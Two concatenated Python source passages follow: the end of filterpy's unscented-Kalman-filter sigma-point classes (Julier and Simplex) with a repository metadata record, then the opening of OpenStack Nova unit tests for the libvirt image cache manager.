pretty_str('kappa', self.kappa),
pretty_str('Wm', self.Wm),
pretty_str('Wc', self.Wc),
pretty_str('subtract', self.subtract),
pretty_str('sqrt', self.sqrt)
])
class JulierSigmaPoints(object):
"""
Generates sigma points and weights according to Simon J. Julier
and Jeffery K. Uhlmann's original paper[1]. It parametizes the sigma
points using kappa.
Parameters
----------
n : int
Dimensionality of the state. 2n+1 weights will be generated.
kappa : float, default=0.
Scaling factor that can reduce high order errors. kappa=0 gives
the standard unscented filter. According to [Julier], if you set
kappa to 3-dim_x for a Gaussian x you will minimize the fourth
order errors in x and P.
sqrt_method : function(ndarray), default=scipy.linalg.cholesky
Defines how we compute the square root of a matrix, which has
no unique answer. Cholesky is the default choice due to its
speed. Typically your alternative choice will be
scipy.linalg.sqrtm. Different choices affect how the sigma points
are arranged relative to the eigenvectors of the covariance matrix.
Usually this will not matter to you; if so the default cholesky()
yields maximal performance. As of van der Merwe's dissertation of
2004 [6] this was not a well reseached area so I have no advice
to give you.
If your method returns a triangular matrix it must be upper
triangular. Do not use numpy.linalg.cholesky - for historical
reasons it returns a lower triangular matrix. The SciPy version
does the right thing.
subtract : callable (x, y), optional
Function that computes the difference between x and y.
You will have to supply this if your state variable cannot support
subtraction, such as angles (359-1 degreees is 2, not 358). x and y
Attributes
----------
Wm : np.array
weight for each sigma point for the mean
Wc : np.array
weight for each sigma point for the covariance
References
----------
.. [1] Julier, Simon J.; Uhlmann, Jeffrey "A New Extension of the Kalman
Filter to Nonlinear Systems". Proc. SPIE 3068, Signal Processing,
Sensor Fusion, and Target Recognition VI, 182 (July 28, 1997)
"""
def __init__(self, n, kappa=0., sqrt_method=None, subtract=None):
self.n = n
self.kappa = kappa
if sqrt_method is None:
self.sqrt = cholesky
else:
self.sqrt = sqrt_method
if subtract is None:
self.subtract = np.subtract
else:
self.subtract = subtract
self._compute_weights()
def num_sigmas(self):
""" Number of sigma points for each variable in the state x"""
return 2*self.n + 1
def sigma_points(self, x, P):
r""" Computes the sigma points for an unscented Kalman filter
given the mean (x) and covariance(P) of the filter.
kappa is an arbitrary constant. Returns sigma points.
Works with both scalar and array inputs:
sigma_points (5, 9, 2) # mean 5, covariance 9
sigma_points ([5, 2], 9*eye(2), 2) # means 5 and 2, covariance 9I
Parameters
----------
x : array-like object of the means of length n
Can be a scalar if 1D.
examples: 1, [1,2], np.array([1,2])
P : scalar, or np.array
Covariance of the filter. If scalar, is treated as eye(n)*P.
kappa : float
Scaling factor.
Returns
-------
sigmas : np.array, of size (2n+1, n)
2D array of sigma points :math:`\chi`. Each column contains all of
the sigmas for one dimension in the problem space. They
are ordered as:
.. math::
:nowrap:
\begin{eqnarray}
\chi[0] = &x \\
\chi[1..n] = &x + [\sqrt{(n+\kappa)P}]_k \\
\chi[n+1..2n] = &x - [\sqrt{(n+\kappa)P}]_k
\end{eqnarray}
"""
if self.n != np.size(x):
raise ValueError("expected size(x) {}, but size is {}".format(
self.n, np.size(x)))
n = self.n
if np.isscalar(x):
x = np.asarray([x])
n = np.size(x) # dimension of problem
if np.isscalar(P):
P = np.eye(n) * P
else:
P = np.atleast_2d(P)
sigmas = np.zeros((2*n+1, n))
# implements U'*U = (n+kappa)*P. Returns lower triangular matrix.
# Take transpose so we can access with U[i]
U = self.sqrt((n + self.kappa) * P)
sigmas[0] = x
for k in range(n):
# pylint: disable=bad-whitespace
sigmas[k+1] = self.subtract(x, -U[k])
sigmas[n+k+1] = self.subtract(x, U[k])
return sigmas
def _compute_weights(self):
""" Computes the weights for the unscented Kalman filter. In this
formulation the weights for the mean and covariance are the same.
"""
n = self.n
k = self.kappa
self.Wm = np.full(2*n+1, .5 / (n + k))
self.Wm[0] = k / (n+k)
self.Wc = self.Wm
def __repr__(self):
return '\n'.join([
'JulierSigmaPoints object',
pretty_str('n', self.n),
pretty_str('kappa', self.kappa),
pretty_str('Wm', self.Wm),
pretty_str('Wc', self.Wc),
pretty_str('subtract', self.subtract),
pretty_str('sqrt', self.sqrt)
])
class SimplexSigmaPoints(object):
"""
Generates sigma points and weights according to the simplex
method presented in [1].
Parameters
----------
n : int
Dimensionality of the state. n+1 weights will be generated.
sqrt_method : function(ndarray), default=scipy.linalg.cholesky
Defines how we compute the square root of a matrix, which has
no unique answer. Cholesky is the default choice due to its
speed. Typically your alternative choice will be
scipy.linalg.sqrtm
If your method returns a triangular matrix it must be upper
triangular. Do not use numpy.linalg.cholesky - for historical
reasons it returns a lower triangular matrix. The SciPy version
does the right thing.
subtract : callable (x, y), optional
Function that computes the difference between x and y.
You will have to supply this if your state variable cannot support
subtraction, such as angles (359-1 degreees is 2, not 358). x and y
are state vectors, not scalars.
Attributes
----------
Wm : np.array
weight for each sigma point for the mean
Wc : np.array
weight for each sigma point for the covariance
References
----------
.. [1] Phillippe Moireau and Dominique Chapelle "Reduced-Order
Unscented Kalman Filtering with Application to Parameter
Identification in Large-Dimensional Systems"
DOI: 10.1051/cocv/2010006
"""
def __init__(self, n, alpha=1, sqrt_method=None, subtract=None):
self.n = n
self.alpha = alpha
if sqrt_method is None:
self.sqrt = cholesky
else:
self.sqrt = sqrt_method
if subtract is None:
self.subtract = np.subtract
else:
self.subtract = subtract
self._compute_weights()
def num_sigmas(self):
""" Number of sigma points for each variable in the state x"""
return self.n + 1
def sigma_points(self, x, P):
"""
Computes the implex sigma points for an unscented Kalman filter
given the mean (x) and covariance(P) of the filter.
Returns tuple of the sigma points and weights.
Works with both scalar and array inputs:
sigma_points (5, 9, 2) # mean 5, covariance 9
sigma_points ([5, 2], 9*eye(2), 2) # means 5 and 2, covariance 9I
Parameters
----------
x : An array-like object of the means of length n
Can be a scalar if 1D.
examples: 1, [1,2], np.array([1,2])
P : scalar, or np.array
Covariance of the filter. If scalar, is treated as eye(n)*P.
Returns
-------
sigmas : np.array, of size (n+1, n)
Two dimensional array of sigma points. Each column contains all of
the sigmas for one dimension in the problem space.
Ordered by Xi_0, Xi_{1..n}
"""
if self.n != np.size(x):
raise ValueError("expected size(x) {}, but size is {}".format(
self.n, np.size(x)))
n = self.n
if np.isscalar(x):
x = np.asarray([x])
x = x.reshape(-1, 1)
if np.isscalar(P):
P = np.eye(n) * P
else:
P = np.atleast_2d(P)
U = self.sqrt(P)
lambda_ = n / (n + 1)
Istar = np.array([[-1/np.sqrt(2*lambda_), 1/np.sqrt(2*lambda_)]])
for d in range(2, n+1):
row = np.ones((1, Istar.shape[1] + 1)) * 1. / np.sqrt(lambda_*d*(d + 1)) # pylint: disable=unsubscriptable-object
row[0, -1] = -d / np.sqrt(lambda_ * d * (d + 1))
Istar = np.r_[np.c_[Istar, np.zeros((Istar.shape[0]))], row] # pylint: disable=unsubscriptable-object
I = np.sqrt(n)*Istar
scaled_unitary = (U.T).dot(I)
sigmas = self.subtract(x, -scaled_unitary)
return sigmas.T
def _compute_weights(self):
""" Computes the weights for the scaled unscented Kalman filter. """
n = self.n
c = 1. / (n + 1)
self.Wm = np.full(n + 1, c)
self.Wc = self.Wm
def __repr__(self):
return '\n'.join([
'SimplexSigmaPoints object',
pretty_str('n', self.n),
pretty_str('alpha', self.alpha),
pretty_str('Wm', self.Wm),
pretty_str('Wc', self.Wc),
pretty_str('subtract', self.subtract),
pretty_str('sqrt', self.sqrt)
])
|
{
"content_hash": "01e2105e5c425959eb244258f7017b21",
"timestamp": "",
"source": "github",
"line_count": 531,
"max_line_length": 125,
"avg_line_length": 30.6120527306968,
"alnum_prop": 0.5768071362657644,
"repo_name": "rlabbe/filterpy",
"id": "37875ae177be18dac5baf565d9e36e4309b5d979",
"size": "16341",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "filterpy/kalman/sigma_points.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "472"
},
{
"name": "Python",
"bytes": "508002"
},
{
"name": "Shell",
"bytes": "674"
}
],
"symlink_target": ""
}
|
import contextlib
import hashlib
import os
import time
import mock
from oslo_concurrency import lockutils
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import formatters
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import importutils
from six.moves import cStringIO
from nova import conductor
from nova import context
from nova import objects
from nova import test
from nova.tests.unit import fake_instance
from nova import utils
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import utils as libvirt_utils
CONF = cfg.CONF
CONF.import_opt('compute_manager', 'nova.service')
CONF.import_opt('host', 'nova.netconf')
@contextlib.contextmanager
def intercept_log_messages():
try:
mylog = logging.getLogger('nova')
stream = cStringIO()
handler = logging.logging.StreamHandler(stream)
handler.setFormatter(formatters.ContextFormatter())
mylog.logger.addHandler(handler)
yield stream
finally:
mylog.logger.removeHandler(handler)
class ImageCacheManagerTestCase(test.NoDBTestCase):
def setUp(self):
super(ImageCacheManagerTestCase, self).setUp()
self.stock_instance_names = set(['instance-00000001',
'instance-00000002',
'instance-00000003',
'banana-42-hamster'])
def test_read_stored_checksum_missing(self):
self.stub_out('os.path.exists', lambda x: False)
csum = imagecache.read_stored_checksum('/tmp/foo', timestamped=False)
self.assertIsNone(csum)
@mock.patch.object(os.path, 'exists', return_value=True)
@mock.patch.object(time, 'time', return_value=2000000)
@mock.patch.object(os.path, 'getmtime', return_value=1000000)
def test_get_age_of_file(self, mock_getmtime, mock_time, mock_exists):
image_cache_manager = imagecache.ImageCacheManager()
exists, age = image_cache_manager._get_age_of_file('/tmp')
self.assertTrue(exists)
self.assertEqual(1000000, age)
@mock.patch.object(os.path, 'exists', return_value=False)
def test_get_age_of_file_not_exists(self, mock_exists):
image_cache_manager = imagecache.ImageCacheManager()
exists, age = image_cache_manager._get_age_of_file('/tmp')
self.assertFalse(exists)
self.assertEqual(0, age)
def test_read_stored_checksum(self):
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
csum_input = '{"sha1": "fdghkfhkgjjksfdgjksjkghsdf"}\n'
fname = os.path.join(tmpdir, 'aaa')
info_fname = imagecache.get_info_filename(fname)
f = open(info_fname, 'w')
f.write(csum_input)
f.close()
csum_output = imagecache.read_stored_checksum(fname,
timestamped=False)
self.assertEqual(csum_input.rstrip(),
'{"sha1": "%s"}' % csum_output)
def test_read_stored_checksum_legacy_essex(self):
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
old_fname = fname + '.sha1'
f = open(old_fname, 'w')
f.write('fdghkfhkgjjksfdgjksjkghsdf')
f.close()
csum_output = imagecache.read_stored_checksum(fname,
timestamped=False)
self.assertEqual(csum_output, 'fdghkfhkgjjksfdgjksjkghsdf')
self.assertFalse(os.path.exists(old_fname))
info_fname = imagecache.get_info_filename(fname)
self.assertTrue(os.path.exists(info_fname))
def test_list_base_images(self):
listing = ['00000001',
'ephemeral_0_20_None',
'17d1b00b81642842e514494a78e804e9a511637c_5368709120.info',
'00000004',
'swap_1000']
images = ['e97222e91fc4241f49a7f520d1dcf446751129b3_sm',
'e09c675c2d1cfac32dae3c2d83689c8c94bc693b_sm',
'e97222e91fc4241f49a7f520d1dcf446751129b3',
'17d1b00b81642842e514494a78e804e9a511637c',
'17d1b00b81642842e514494a78e804e9a511637c_5368709120',
'17d1b00b81642842e514494a78e804e9a511637c_10737418240']
listing.extend(images)
self.stub_out('os.listdir', lambda x: listing)
self.stub_out('os.path.isfile', lambda x: True)
base_dir = '/var/lib/nova/instances/_base'
self.flags(instances_path='/var/lib/nova/instances')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._list_base_images(base_dir)
sanitized = []
for ent in image_cache_manager.unexplained_images:
sanitized.append(ent.replace(base_dir + '/', ''))
self.assertEqual(sorted(sanitized), sorted(images))
expected = os.path.join(base_dir,
'e97222e91fc4241f49a7f520d1dcf446751129b3')
self.assertIn(expected, image_cache_manager.unexplained_images)
expected = os.path.join(base_dir,
'17d1b00b81642842e514494a78e804e9a511637c_'
'10737418240')
self.assertIn(expected, image_cache_manager.unexplained_images)
unexpected = os.path.join(base_dir, '00000004')
self.assertNotIn(unexpected, image_cache_manager.unexplained_images)
for ent in image_cache_manager.unexplained_images:
self.assertTrue(ent.startswith(base_dir))
self.assertEqual(len(image_cache_manager.originals), 2)
expected = os.path.join(base_dir,
'17d1b00b81642842e514494a78e804e9a511637c')
self.assertIn(expected, image_cache_manager.originals)
unexpected = os.path.join(base_dir,
'17d1b00b81642842e514494a78e804e9a511637c_'
'10737418240')
self.assertNotIn(unexpected, image_cache_manager.originals)
self.assertEqual(1, len(image_cache_manager.back_swap_images))
self.assertIn('swap_1000', image_cache_manager.back_swap_images)
def test_list_backing_images_small(self):
self.stub_out('os.listdir',
lambda x: ['_base', 'instance-00000001',
'instance-00000002', 'instance-00000003'])
self.stub_out('os.path.exists',
lambda x: x.find('instance-') != -1)
self.stubs.Set(libvirt_utils, 'get_disk_backing_file',
lambda x: 'e97222e91fc4241f49a7f520d1dcf446751129b3_sm')
found = os.path.join(CONF.instances_path,
CONF.image_cache_subdirectory_name,
'e97222e91fc4241f49a7f520d1dcf446751129b3_sm')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [found]
image_cache_manager.instance_names = self.stock_instance_names
inuse_images = image_cache_manager._list_backing_images()
self.assertEqual(inuse_images, [found])
self.assertEqual(len(image_cache_manager.unexplained_images), 0)
def test_list_backing_images_resized(self):
self.stub_out('os.listdir',
lambda x: ['_base', 'instance-00000001',
'instance-00000002', 'instance-00000003'])
self.stub_out('os.path.exists',
lambda x: x.find('instance-') != -1)
self.stubs.Set(libvirt_utils, 'get_disk_backing_file',
lambda x: ('e97222e91fc4241f49a7f520d1dcf446751129b3_'
'10737418240'))
found = os.path.join(CONF.instances_path,
CONF.image_cache_subdirectory_name,
'e97222e91fc4241f49a7f520d1dcf446751129b3_'
'10737418240')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [found]
image_cache_manager.instance_names = self.stock_instance_names
inuse_images = image_cache_manager._list_backing_images()
self.assertEqual(inuse_images, [found])
self.assertEqual(len(image_cache_manager.unexplained_images), 0)
def test_list_backing_images_instancename(self):
self.stub_out('os.listdir',
lambda x: ['_base', 'banana-42-hamster'])
self.stub_out('os.path.exists',
lambda x: x.find('banana-42-hamster') != -1)
self.stubs.Set(libvirt_utils, 'get_disk_backing_file',
lambda x: 'e97222e91fc4241f49a7f520d1dcf446751129b3_sm')
found = os.path.join(CONF.instances_path,
CONF.image_cache_subdirectory_name,
'e97222e91fc4241f49a7f520d1dcf446751129b3_sm')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [found]
image_cache_manager.instance_names = self.stock_instance_names
inuse_images = image_cache_manager._list_backing_images()
self.assertEqual(inuse_images, [found])
self.assertEqual(len(image_cache_manager.unexplained_images), 0)
def test_list_backing_images_disk_notexist(self):
self.stub_out('os.listdir',
lambda x: ['_base', 'banana-42-hamster'])
self.stub_out('os.path.exists',
lambda x: x.find('banana-42-hamster') != -1)
def fake_get_disk(disk_path):
raise processutils.ProcessExecutionError()
self.stubs.Set(libvirt_utils, 'get_disk_backing_file', fake_get_disk)
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = []
image_cache_manager.instance_names = self.stock_instance_names
self.assertRaises(processutils.ProcessExecutionError,
image_cache_manager._list_backing_images)
def test_find_base_file_nothing(self):
self.stub_out('os.path.exists', lambda x: False)
base_dir = '/var/lib/nova/instances/_base'
fingerprint = '549867354867'
image_cache_manager = imagecache.ImageCacheManager()
res = list(image_cache_manager._find_base_file(base_dir, fingerprint))
self.assertEqual(0, len(res))
def test_find_base_file_small(self):
fingerprint = '968dd6cc49e01aaa044ed11c0cce733e0fa44a6a'
self.stub_out('os.path.exists',
lambda x: x.endswith('%s_sm' % fingerprint))
base_dir = '/var/lib/nova/instances/_base'
image_cache_manager = imagecache.ImageCacheManager()
res = list(image_cache_manager._find_base_file(base_dir, fingerprint))
base_file = os.path.join(base_dir, fingerprint + '_sm')
self.assertEqual(res, [(base_file, True, False)])
def test_find_base_file_resized(self):
fingerprint = '968dd6cc49e01aaa044ed11c0cce733e0fa44a6a'
listing = ['00000001',
'ephemeral_0_20_None',
'968dd6cc49e01aaa044ed11c0cce733e0fa44a6a_10737418240',
'00000004']
self.stub_out('os.listdir', lambda x: listing)
self.stub_out('os.path.exists',
lambda x: x.endswith('%s_10737418240' % fingerprint))
self.stub_out('os.path.isfile', lambda x: True)
base_dir = '/var/lib/nova/instances/_base'
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._list_base_images(base_dir)
res = list(image_cache_manager._find_base_file(base_dir, fingerprint))
base_file = os.path.join(base_dir, fingerprint + '_10737418240')
self.assertEqual(res, [(base_file, False, True)])
def test_find_base_file_all(self):
fingerprint = '968dd6cc49e01aaa044ed11c0cce733e0fa44a6a'
listing = ['00000001',
'ephemeral_0_20_None',
'968dd6cc49e01aaa044ed11c0cce733e0fa44a6a_sm',
'968dd6cc49e01aaa044ed11c0cce733e0fa44a6a_10737418240',
'00000004']
self.stub_out('os.listdir', lambda x: listing)
self.stub_out('os.path.exists', lambda x: True)
self.stub_out('os.path.isfile', lambda x: True)
base_dir = '/var/lib/nova/instances/_base'
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._list_base_images(base_dir)
res = list(image_cache_manager._find_base_file(base_dir, fingerprint))
base_file1 = os.path.join(base_dir, fingerprint)
base_file2 = os.path.join(base_dir, fingerprint + '_sm')
base_file3 = os.path.join(base_dir, fingerprint + '_10737418240')
self.assertEqual(res, [(base_file1, False, False),
(base_file2, True, False),
(base_file3, False, True)])
@contextlib.contextmanager
def _make_base_file(self, checksum=True, lock=True):
"""Make a base file for testing."""
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
base_file = open(fname, 'w')
base_file.write('data')
base_file.close()
if lock:
lockdir = os.path.join(tmpdir, 'locks')
lockname = os.path.join(lockdir, 'nova-aaa')
os.mkdir(lockdir)
lock_file = open(lockname, 'w')
lock_file.write('data')
lock_file.close()
base_file = open(fname, 'r')
if checksum:
imagecache.write_stored_checksum(fname)
base_file.close()
yield fname
def test_remove_base_file(self):
with self._make_base_file() as fname:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._remove_base_file(fname)
info_fname = imagecache.get_info_filename(fname)
lock_name = 'nova-' + os.path.split(fname)[-1]
lock_dir = os.path.join(CONF.instances_path, 'locks')
lock_file = os.path.join(lock_dir, lock_name)
# Files are initially too new to delete
self.assertTrue(os.path.exists(fname))
self.assertTrue(os.path.exists(info_fname))
self.assertTrue(os.path.exists(lock_file))
# Old files get cleaned up though
os.utime(fname, (-1, time.time() - 3601))
image_cache_manager._remove_base_file(fname)
self.assertFalse(os.path.exists(fname))
self.assertFalse(os.path.exists(info_fname))
self.assertFalse(os.path.exists(lock_file))
def test_remove_base_file_original(self):
with self._make_base_file() as fname:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.originals = [fname]
image_cache_manager._remove_base_file(fname)
info_fname = imagecache.get_info_filename(fname)
# Files are initially too new to delete
self.assertTrue(os.path.exists(fname))
self.assertTrue(os.path.exists(info_fname))
# This file should stay longer than a resized image
os.utime(fname, (-1, time.time() - 3601))
image_cache_manager._remove_base_file(fname)
self.assertTrue(os.path.exists(fname))
self.assertTrue(os.path.exists(info_fname))
# Originals don't stay forever though
os.utime(fname, (-1, time.time() - 3600 * 25))
image_cache_manager._remove_base_file(fname)
self.assertFalse(os.path.exists(fname))
self.assertFalse(os.path.exists(info_fname))
def test_remove_base_file_dne(self):
# This test is solely to execute the "does not exist" code path. We
# don't expect the method being tested to do anything in this case.
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._remove_base_file(fname)
def test_remove_base_file_oserror(self):
with intercept_log_messages() as stream:
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
os.mkdir(fname)
os.utime(fname, (-1, time.time() - 3601))
# This will raise an OSError because of file permissions
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._remove_base_file(fname)
self.assertTrue(os.path.exists(fname))
self.assertNotEqual(stream.getvalue().find('Failed to remove'),
-1)
def test_handle_base_image_unused(self):
img = '123'
with self._make_base_file() as fname:
os.utime(fname, (-1, time.time() - 3601))
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager._handle_base_image(img, fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files,
[fname])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
@mock.patch.object(libvirt_utils, 'update_mtime')
def test_handle_base_image_used(self, mock_mtime):
img = '123'
with self._make_base_file() as fname:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager.used_images = {'123': (1, 0, ['banana-42'])}
image_cache_manager._handle_base_image(img, fname)
mock_mtime.assert_called_once_with(fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
@mock.patch.object(libvirt_utils, 'update_mtime')
def test_handle_base_image_used_remotely(self, mock_mtime):
img = '123'
with self._make_base_file() as fname:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager.used_images = {'123': (0, 1, ['banana-42'])}
image_cache_manager._handle_base_image(img, fname)
mock_mtime.assert_called_once_with(fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
def test_handle_base_image_absent(self):
img = '123'
with intercept_log_messages() as stream:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.used_images = {'123': (1, 0, ['banana-42'])}
image_cache_manager._handle_base_image(img, None)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
self.assertNotEqual(stream.getvalue().find('an absent base file'),
-1)
def test_handle_base_image_used_missing(self):
img = '123'
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager.used_images = {'123': (1, 0, ['banana-42'])}
image_cache_manager._handle_base_image(img, fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
@mock.patch.object(libvirt_utils, 'update_mtime')
def test_handle_base_image_checksum_fails(self, mock_mtime):
self.flags(checksum_base_images=True, group='libvirt')
img = '123'
with self._make_base_file() as fname:
with open(fname, 'w') as f:
f.write('banana')
d = {'sha1': '21323454'}
with open('%s.info' % fname, 'w') as f:
f.write(jsonutils.dumps(d))
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager.used_images = {'123': (1, 0, ['banana-42'])}
image_cache_manager._handle_base_image(img, fname)
mock_mtime.assert_called_once_with(fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files,
[fname])
@mock.patch.object(libvirt_utils, 'update_mtime')
@mock.patch.object(lockutils, 'external_lock')
def test_verify_base_images(self, mock_lock, mock_mtime):
hashed_1 = '356a192b7913b04c54574d18c28d46e6395428ab'
hashed_21 = '472b07b9fcf2c2451e8781e944bf5f77cd8457c8'
hashed_22 = '12c6fc06c99a462375eeb3f43dfd832b08ca9e17'
hashed_42 = '92cfceb39d57d914ed8b14d0e37643de0797ae56'
self.flags(instances_path='/instance_path',
image_cache_subdirectory_name='_base')
base_file_list = ['00000001',
'ephemeral_0_20_None',
'e97222e91fc4241f49a7f520d1dcf446751129b3_sm',
'e09c675c2d1cfac32dae3c2d83689c8c94bc693b_sm',
hashed_42,
hashed_1,
hashed_21,
hashed_22,
'%s_5368709120' % hashed_1,
'%s_10737418240' % hashed_1,
'00000004']
def fq_path(path):
return os.path.join('/instance_path/_base/', path)
# Fake base directory existence
orig_exists = os.path.exists
def exists(path):
# The python coverage tool got angry with my overly broad mocks
if not path.startswith('/instance_path'):
return orig_exists(path)
if path in ['/instance_path',
'/instance_path/_base',
'/instance_path/instance-1/disk',
'/instance_path/instance-2/disk',
'/instance_path/instance-3/disk',
'/instance_path/_base/%s.info' % hashed_42]:
return True
for p in base_file_list:
if path == fq_path(p):
return True
if path == fq_path(p) + '.info':
return False
if path in ['/instance_path/_base/%s_sm' % i for i in [hashed_1,
hashed_21,
hashed_22,
hashed_42]]:
return False
self.fail('Unexpected path existence check: %s' % path)
self.stub_out('os.path.exists', lambda x: exists(x))
# Fake up some instances in the instances directory
orig_listdir = os.listdir
def listdir(path):
# The python coverage tool got angry with my overly broad mocks
if not path.startswith('/instance_path'):
return orig_listdir(path)
if path == '/instance_path':
return ['instance-1', 'instance-2', 'instance-3', '_base']
if path == '/instance_path/_base':
return base_file_list
self.fail('Unexpected directory listed: %s' % path)
self.stub_out('os.listdir', lambda x: listdir(x))
# Fake isfile for these faked images in _base
orig_isfile = os.path.isfile
def isfile(path):
# The python coverage tool got angry with my overly broad mocks
if not path.startswith('/instance_path'):
return orig_isfile(path)
for p in base_file_list:
if path == fq_path(p):
return True
self.fail('Unexpected isfile call: %s' % path)
self.stub_out('os.path.isfile', lambda x: isfile(x))
# Fake the database call which lists running instances
instances = [{'image_ref': '1',
'host': CONF.host,
'name': 'instance-1',
'uuid': '123',
'vm_state': '',
'task_state': ''},
{'image_ref': '1',
'kernel_id': '21',
'ramdisk_id': '22',
'host': CONF.host,
'name': 'instance-2',
'uuid': '456',
'vm_state': '',
'task_state': ''}]
all_instances = [fake_instance.fake_instance_obj(None, **instance)
for instance in instances]
image_cache_manager = imagecache.ImageCacheManager()
# Fake the utils call which finds the backing image
def get_disk_backing_file(path):
if path in ['/instance_path/instance-1/disk',
'/instance_path/instance-2/disk']:
return fq_path('%s_5368709120' % hashed_1)
self.fail('Unexpected backing file lookup: %s' % path)
self.stubs.Set(libvirt_utils, 'get_disk_backing_file',
lambda x: get_disk_backing_file(x))
# Fake out verifying checksums, as that is tested elsewhere
self.stubs.Set(image_cache_manager, '_verify_checksum',
lambda x, y: True)
# Fake getmtime as well
orig_getmtime = os.path.getmtime
def getmtime(path):
if not path.startswith('/instance_path'):
return orig_getmtime(path)
return 1000000
self.stub_out('os.path.getmtime', lambda x: getmtime(x))
# Make sure we don't accidentally remove a real file
orig_remove = os.remove
def remove(path):
if not path.startswith('/instance_path'):
return orig_remove(path)
# Don't try to remove fake files
return
self.stub_out('os.remove', lambda x: remove(x))
self.mox.StubOutWithMock(objects.block_device.BlockDeviceMappingList,
'get_by_instance_uuid')
ctxt = context.get_admin_context()
objects.block_device.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, '123').AndReturn(None)
objects.block_device.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, '456').AndReturn(None)
self.mox.ReplayAll()
# And finally we can make the call we're actually testing...
# The argument here should be a context, but it is mocked out
image_cache_manager.update(ctxt, all_instances)
# Verify
active = [fq_path(hashed_1), fq_path('%s_5368709120' % hashed_1),
fq_path(hashed_21), fq_path(hashed_22)]
for act in active:
self.assertIn(act, image_cache_manager.active_base_files)
self.assertEqual(len(image_cache_manager.active_base_files),
len(active))
for rem in [fq_path('e97222e91fc4241f49a7f520d1dcf446751129b3_sm'),
fq_path('e09c675c2d1cfac32dae3c2d83689c8c94bc693b_sm'),
fq_path(hashed_42),
fq_path('%s_10737418240' % hashed_1)]:
self.assertIn(rem, image_cache_manager.removable_base_files)
# Ensure there are no "corrupt" images as well
self.assertEqual(len(image_cache_manager.corrupt_base_files), 0)
def test_verify_base_images_no_base(self):
self.flags(instances_path='/tmp/no/such/dir/name/please')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.update(None, [])
def test_is_valid_info_file(self):
hashed = 'e97222e91fc4241f49a7f520d1dcf446751129b3'
self.flags(instances_path='/tmp/no/such/dir/name/please')
self.flags(image_info_filename_pattern=('$instances_path/_base/'
'%(image)s.info'),
group='libvirt')
base_filename = os.path.join(CONF.instances_path, '_base', hashed)
is_valid_info_file = imagecache.is_valid_info_file
self.assertFalse(is_valid_info_file('banana'))
self.assertFalse(is_valid_info_file(
os.path.join(CONF.instances_path, '_base', '00000001')))
self.assertFalse(is_valid_info_file(base_filename))
self.assertFalse(is_valid_info_file(base_filename + '.sha1'))
self.assertTrue(is_valid_info_file(base_filename + '.info'))
def test_configured_checksum_path(self):
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
# Ensure there is a base directory
os.mkdir(os.path.join(tmpdir, '_base'))
# Fake the database call which lists running instances
instances = [{'image_ref': '1',
'host': CONF.host,
'name': 'instance-1',
'uuid': '123',
'vm_state': '',
'task_state': ''},
